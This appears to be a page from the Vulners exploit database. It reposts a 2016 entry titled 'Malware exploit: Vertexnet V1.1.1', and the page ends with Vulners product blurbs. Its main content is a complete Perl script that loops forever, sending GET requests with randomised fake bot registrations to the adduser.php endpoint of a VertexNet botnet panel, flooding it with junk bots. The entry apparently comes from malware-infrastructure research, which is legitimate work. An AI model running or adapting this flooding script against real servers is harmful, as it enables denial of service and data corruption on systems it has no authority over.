Lucene search
K

Malware exploit: Vertexnet V1.1.1

🗓️ 14 Dec 2016 00:00:00Reported by XylitolType 
pwnmalw
 pwnmalw
🔗 www.pwnmalw.re👁 549 Views

Malware exploit on Vertexnet V1.1.

Code
<code>#!/usr/bin/perl
# VertexNet v1.1.1 Flood Bots
# http://www.virustotal.com/file-scan/report.html?id=fd373a8f4adf29001d282b963f126f760afcf3e58117f6024b2d65a36d41f617-1305491791
# Xyl2k! :þ

use HTTP::Request;
use LWP::UserAgent;

$URL = "http://localhost/Panel/adduser.php";

$useragent = LWP::UserAgent -&gt; new();
$useragent -&gt; agent('V32');

$try = 0;

        while(1)
        {
                $rnd = rand();

                $request = HTTP::Request -&gt; new(GET =&gt; $URL . '?uid={' . $rnd . '}&amp;lan=127.0.0.1&amp;cmpname=Xyl2k!&amp;country=Fran.ais%20(France)%20+33&amp;cc=FR&amp;idle=0&amp;ver=v1337');
                $response = $useragent -&gt; request($request);

                if ($response -&gt; is_success)
                {
                                $try++;
                                print("[~] The fire day " . $try . "\n");
                }
        }
</code>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation